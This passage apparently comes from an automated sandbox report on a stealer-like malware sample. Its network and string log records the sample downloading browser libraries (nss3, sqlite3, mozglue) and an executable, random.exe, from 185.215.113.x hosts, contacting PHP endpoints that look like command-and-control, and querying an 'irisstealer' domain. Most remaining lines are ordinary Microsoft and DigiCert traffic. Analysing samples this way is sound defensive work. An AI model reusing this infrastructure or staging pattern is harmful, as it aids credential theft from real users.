                      Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: apis.google.com
                      Source: global trafficDNS traffic detected: DNS query: play.google.com
                      Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                      Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                      Source: global trafficDNS traffic detected: DNS query: c.msn.com
                      Source: global trafficDNS traffic detected: DNS query: api.msn.com
                      Source: global trafficDNS traffic detected: DNS query: store1.gofile.io
                      Source: global trafficDNS traffic detected: DNS query: file4.gofile.io
                      Source: global trafficDNS traffic detected: DNS query: script.irisstealer.xyz
                      Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D85000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000002.00000002.1827339860.000000000191E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                      Source: file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                      Source: file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                      Source: file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll&
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                      Source: file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                      Source: file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllI
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllF
                      Source: file.exe, 00000002.00000002.1827339860.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                      Source: file.exe, 00000002.00000002.1827339860.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllf
                      Source: file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/Z
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
                      Source: file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9)
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpcoZ
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D85000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpnb
                      Source: file.exe, 00000002.00000002.1825004684.0000000000D85000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206rontdesk
                      Source: skotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                      Source: skotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: file.exe, 00000002.00000002.1868728023.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: file.exe, 00000002.00000002.1863861584.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://assets.msn.cn/resolver/
                      Source: e5bf6995-41a9-4cb6-af64-5cb6973f938e.tmp.16.drString found in binary or memory: https://assets.msn.com
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://assets.msn.com/resolver/
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://bard.google.com/
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://bit.ly/wb-precache
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://browser.events.data.msn.cn/
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://browser.events.data.msn.com/
                      Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://c.msn.com/
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: manifest.json.15.drString found in binary or memory: https://chrome.google.com/webstore/
                      Source: manifest.json.15.drString found in binary or memory: https://chromewebstore.google.com/
                      Source: e5bf6995-41a9-4cb6-af64-5cb6973f938e.tmp.16.drString found in binary or memory: https://clients2.google.com
                      Source: manifest.json0.15.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: e5bf6995-41a9-4cb6-af64-5cb6973f938e.tmp.16.drString found in binary or memory: https://clients2.googleusercontent.com
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: manifest.json0.15.drString found in binary or memory: https://docs.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-autopush.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-preprod.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive-staging.corp.google.com/
                      Source: manifest.json0.15.drString found in binary or memory: https://drive.google.com/
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: 000003.log4.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                      Source: 000003.log4.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                      Source: 559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
